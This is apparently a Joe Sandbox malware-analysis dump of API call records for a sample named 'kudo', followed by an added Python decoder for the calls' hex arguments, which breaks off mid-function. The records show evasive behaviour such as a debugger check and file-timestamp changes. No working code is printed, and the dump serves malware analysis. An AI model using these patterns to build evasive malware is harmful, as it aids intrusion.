                                                      • Instruction ID: 4136f12895760623cf0f01088c66b8fe1d4f6e2d473f14b9b6170a6083cb2ddd
                                                      • Opcode Fuzzy Hash: 55d689632686b2609276c240349772dd4aaa68d849c6ef7bec23ca203e8958cd
                                                      • Instruction Fuzzy Hash: 2CF0813550222DA6CF10BAA8FC159DEBBA8FF01351F144566F904E6282DFB09AC49AD6
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00A3E11D
                                                      • ExitProcess.KERNEL32(00000000), ref: 00A3E13C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$CreateExit
                                                      • String ID: D
                                                      • API String ID: 126409537-2746444292
                                                      • Opcode ID: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                      • Instruction ID: 48588a90e17248cac70f20230e9389ee552f603f72ba4ca16a131003080e5bb3
                                                      • Opcode Fuzzy Hash: 0821f884aa5cc6b4c195274ad0b22897ff79d929f6fdf946f6e29fa30509634f
                                                      • Instruction Fuzzy Hash: 3BF0EC7594024CABDB60EFE0CD49FEE77BCBF08701F508518FA0A9A180DA7896088B61
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 008698F8
                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0086990F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 1e956e11c3998c96863e1478e3dfe7441573f0d9bf8a0e5505b18642736b5e12
                                                      • Instruction ID: f79048711561f1d86fa26ff34e76647ccc4d5830344642d522e377396cc4bb52
                                                      • Opcode Fuzzy Hash: 1e956e11c3998c96863e1478e3dfe7441573f0d9bf8a0e5505b18642736b5e12
                                                      • Instruction Fuzzy Hash: B8D05E7958030DABDB509BA4DC0EFDA7B3CF704700F0002B1BB54D11A2EAB095988B91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d5f02163afd50e0609aac767d0b6b34776031a511e39f6155be861c0d6f26b0
                                                      • Instruction ID: 23ecbf04916ae2cf029c940b67f598817c80a2d922d04ea000e7108e1fd9be25
                                                      • Opcode Fuzzy Hash: 4d5f02163afd50e0609aac767d0b6b34776031a511e39f6155be861c0d6f26b0
                                                      • Instruction Fuzzy Hash: E2F118716083059FCB14DF28C884A6ABBE5FF89314F54892EF899DB252D770E945CF82
                                                      APIs
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00820193
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0082019B
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008201A6
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008201B1
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008201B9
                                                        • Part of subcall function 00820162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008201C1
                                                        • Part of subcall function 008160F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00816154
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0080F9CD
                                                      • OleInitialize.OLE32(00000000), ref: 0080FA4A
                                                      • CloseHandle.KERNEL32(00000000), ref: 008445C8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                      • String ID:
                                                      • API String ID: 3094916012-0
                                                      • Opcode ID: 8ac90df0cc99369460a598582e48f622148595ba7cd3bd00cbad43040f42fe79
                                                      • Instruction ID: 72107a528fdccd4d6ae7c1363c95f94eaf3c7b68ff5069eb62fc3370455dabad
                                                      • Opcode Fuzzy Hash: 8ac90df0cc99369460a598582e48f622148595ba7cd3bd00cbad43040f42fe79
                                                      • Instruction Fuzzy Hash: 8D81ACF0905A808ECF88DF79A845E197BF5FBA9306790812AD119CB372EB7464C58F19
                                                      APIs
                                                      • _memset.LIBCMT ref: 00804370
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00804415
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00804432
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 64a1e64ab8dd83d7b845e48a7dbffdc9e7c58d1ab39029628c8f83f540056aa2
                                                      • Instruction ID: 1b39e270ce9322e0d454ff22941ebd7f2c68809bb675220b37fd14ad72546eb9
                                                      • Opcode Fuzzy Hash: 64a1e64ab8dd83d7b845e48a7dbffdc9e7c58d1ab39029628c8f83f540056aa2
                                                      • Instruction Fuzzy Hash: F43193B05057018FD760DF24DC84A9BBBF8FB58308F00192EE69AC2291D771B984CB96
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00825733
                                                        • Part of subcall function 0082A16B: __NMSG_WRITE.LIBCMT ref: 0082A192
                                                        • Part of subcall function 0082A16B: __NMSG_WRITE.LIBCMT ref: 0082A19C
                                                      • __NMSG_WRITE.LIBCMT ref: 0082573A
                                                        • Part of subcall function 0082A1C8: GetModuleFileNameW.KERNEL32(00000000,008C33BA,00000104,00000000,00000001,00000000), ref: 0082A25A
                                                        • Part of subcall function 0082A1C8: ___crtMessageBoxW.LIBCMT ref: 0082A308
                                                        • Part of subcall function 0082309F: ___crtCorExitProcess.LIBCMT ref: 008230A5
                                                        • Part of subcall function 0082309F: ExitProcess.KERNEL32 ref: 008230AE
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      • RtlAllocateHeap.NTDLL(009E0000,00000000,00000001), ref: 0082575F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: b9683e9ab48ebc1889450a4f8785345b58f10b61de0cf3bdc92f8c706f4de5ba
                                                      • Instruction ID: 53330f4711c5cca4d9bf97f6a87d80ab13efcd13b663173200103200e6dd1274
                                                      • Opcode Fuzzy Hash: b9683e9ab48ebc1889450a4f8785345b58f10b61de0cf3bdc92f8c706f4de5ba
                                                      • Instruction Fuzzy Hash: A901DE352C0B31DEEA11273CBC96A2A7398FF82772F50042AF905DA282DE7089C14662
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 008698BB
                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00869548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008698D1
                                                      • CloseHandle.KERNEL32(00000000), ref: 008698D8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 47802a5e08dc84e316202db912a9db62bf39682c130fc8ec359e805d6a2dad7c
                                                      • Instruction ID: 216812fa413d0cffc01ad6bbd29fd0471697dbd72c11e9d021c0289312593fc7
                                                      • Opcode Fuzzy Hash: 47802a5e08dc84e316202db912a9db62bf39682c130fc8ec359e805d6a2dad7c
                                                      • Instruction Fuzzy Hash: 5EE08632140214B7D7222B58EC0DFDA7B19FB06760F104120FB54A90E187B115219798
                                                      APIs
                                                      • _free.LIBCMT ref: 00868D1B
                                                        • Part of subcall function 00822D55: HeapFree.KERNEL32(00000000,00000000), ref: 00822D69
                                                        • Part of subcall function 00822D55: GetLastError.KERNEL32(00000000,?,00829A24), ref: 00822D7B
                                                      • _free.LIBCMT ref: 00868D2C
                                                      • _free.LIBCMT ref: 00868D3E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                      • Instruction ID: 9ab6a39feaf037924826457b79e233bf944a6a16dc623bb22b59b69be66e2b0c
                                                      • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                      • Instruction Fuzzy Hash: 8BE012B160261597DB24A57CB941A9313DCEF5C3527150A1DB50DD7186CE64F8928174
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 780b8bcd6d6351b75b762baf2cf70074140ab74a7f9fcfa30bf1d9b47ec7bd32
                                                      • Instruction ID: 4c5eff920df935d5ec0d0443489168535852499534442f4637d262277a8d29d7
                                                      • Opcode Fuzzy Hash: 780b8bcd6d6351b75b762baf2cf70074140ab74a7f9fcfa30bf1d9b47ec7bd32
                                                      • Instruction Fuzzy Hash: 8E225774508305DFD768DF18C890A6ABBE1FF84314F15896DE98ACB2A2D731EC45CB82
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: e6e263d036aaacb54aaae30eb24feb8dd4705638478eeff16f5644d1202479d4
                                                      • Instruction ID: 64ed0c77967976b4892d97c2404113b8cb7b4e23a92ab6322e3be294c7b7ba68
                                                      • Opcode Fuzzy Hash: e6e263d036aaacb54aaae30eb24feb8dd4705638478eeff16f5644d1202479d4
                                                      • Instruction Fuzzy Hash: 0F419CE1A8025C6BDF618B58CC517BE7FA1FF42304F286474EE82DB2C2D6349D4083A2
                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 00A3E25D
                                                        • Part of subcall function 00A3D9B8: GetFileAttributesW.KERNEL32(?), ref: 00A3D9C3
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A3E2B6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFileFolderPath
                                                      • String ID:
                                                      • API String ID: 1991693529-0
                                                      • Opcode ID: a3b6a8a6679e218569cdf7ec21d574e2a71d3681db11f0c994629a20e293bd28
                                                      • Instruction ID: 12fd329cc593bdbc6bd7c3dc807a3dbc5d68d0869366c28dd2ee98c046f7b2fe
                                                      • Opcode Fuzzy Hash: a3b6a8a6679e218569cdf7ec21d574e2a71d3681db11f0c994629a20e293bd28
                                                      • Instruction Fuzzy Hash: 82614F31A1420896EF14DFA0D854BEF733AEF58700F00556DF60DEB2D0EA759A85C7A5
                                                      APIs
                                                      • 73666F36.UXTHEME ref: 00804834
                                                        • Part of subcall function 0082336C: __lock.LIBCMT ref: 00823372
                                                        • Part of subcall function 0082336C: RtlDecodePointer.NTDLL(00000001), ref: 0082337E
                                                        • Part of subcall function 0082336C: RtlEncodePointer.NTDLL(?), ref: 00823389
                                                        • Part of subcall function 008048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00804915
                                                        • Part of subcall function 008048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0080492A
                                                        • Part of subcall function 00803B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00803B68
                                                        • Part of subcall function 00803B3A: IsDebuggerPresent.KERNEL32 ref: 00803B7A
                                                        • Part of subcall function 00803B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008C52F8,008C52E0,?,?), ref: 00803BEB
                                                        • Part of subcall function 00803B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00803C6F
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00804874
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$73666DebuggerDecodeEncodeFullNamePathPresent__lock
                                                      • String ID:
                                                      • API String ID: 1649018686-0
                                                      • Opcode ID: 41a69e7edaeca7beff5bf1a02788bcfc452791ed6501068901b2a8bfdd71962a
                                                      • Instruction ID: 4d6dc8ecc2359bbd7fb985a9ef95dd2371e1b4fcbb090c91f26035e478fc8bc5
                                                      • Opcode Fuzzy Hash: 41a69e7edaeca7beff5bf1a02788bcfc452791ed6501068901b2a8bfdd71962a
                                                      • Instruction Fuzzy Hash: 74118E719043459BCB00EF28EC0590ABBF8FB94750F10892EF480C32B2DB709A49CB96
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00805CC7
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 0083DD73
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c0dfda6a3bac0c8cbdd61f6b964f419fd94baf8fb1821a8a2b9295c1db9154cb
                                                      • Instruction ID: ab5a7c041382a52a819b3e26346801798f508ec7115b8418172068604466ed1a
                                                      • Opcode Fuzzy Hash: c0dfda6a3bac0c8cbdd61f6b964f419fd94baf8fb1821a8a2b9295c1db9154cb
                                                      • Instruction Fuzzy Hash: 4E016D70244708BEF2611E28CC8AF663A9CFB01768F108319BAE59A1E1C6B41C448F60
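The plugin prints each API call with its stack arguments as raw hex, so reading the CreateFileW records above (and the SHGetFolderPathW record further up) means decoding the Win32 constants by hand: 40000000 is GENERIC_WRITE, 00000007 is all three FILE_SHARE_* bits, 00000003 is OPEN_EXISTING, 00000004 is OPEN_ALWAYS, and the 0000001C passed to SHGetFolderPathW is CSIDL_LOCAL_APPDATA. The decoder below is an added example and is not part of the Joe Sandbox report or its tooling; the constants are the Windows SDK values, and the sample lines are copied from the call records on this page. A GENERIC_WRITE open of an existing file handed straight to SetFileTime, as in the first record, is the sequence one checks when looking for timestamp tampering on a dropped payload.

```python
"""Decode 'Api.MODULE(arg,...), ref: ADDR' call records from a Joe Sandbox IDA plugin dump.
Added example, not part of the Joe Sandbox report; constants are Windows SDK values."""
import re
from typing import Any, Dict, List, Optional

# Win32 constants (Windows SDK) used to label the raw hex arguments.
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_FLAGS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}
CSIDL = {0x07: "CSIDL_STARTUP", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}
CSIDL_FLAG_CREATE = 0x8000  # may be OR-ed into nFolder; low byte is the folder id

# One call as the plugin prints it: Api.MODULE(arg,arg,...), ref: ADDRESS
_CALL_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

# Sample records, copied from the call lists in this report (constructed test input).
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 008698BB",
    "• SetFileTime.KERNEL32(00000000,?,00000000,?,?,00869548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008698D1",
    "• CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00805CC7",
    "• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 0083DD73",
    "• SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 00A3E25D",
    "• Part of subcall function 0082336C: __lock.LIBCMT ref: 00823372",  # no argument list: skipped
]


def _flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as NAME|NAME, keeping bits the table does not know as hex."""
    names = [name for bit, name in table.items() if value & bit == bit]
    known = sum(bit for bit in table if value & bit == bit)
    if value & ~known:
        names.append(f"0x{value & ~known:X}")
    return "|".join(names) if names else "0"


def _arg(tok: str) -> Optional[int]:
    """Hex argument as int; '?' (value not recovered by the plugin) becomes None."""
    try:
        return int(tok.strip(), 16)
    except ValueError:
        return None


def parse_call(line: str) -> Optional[Dict[str, Any]]:
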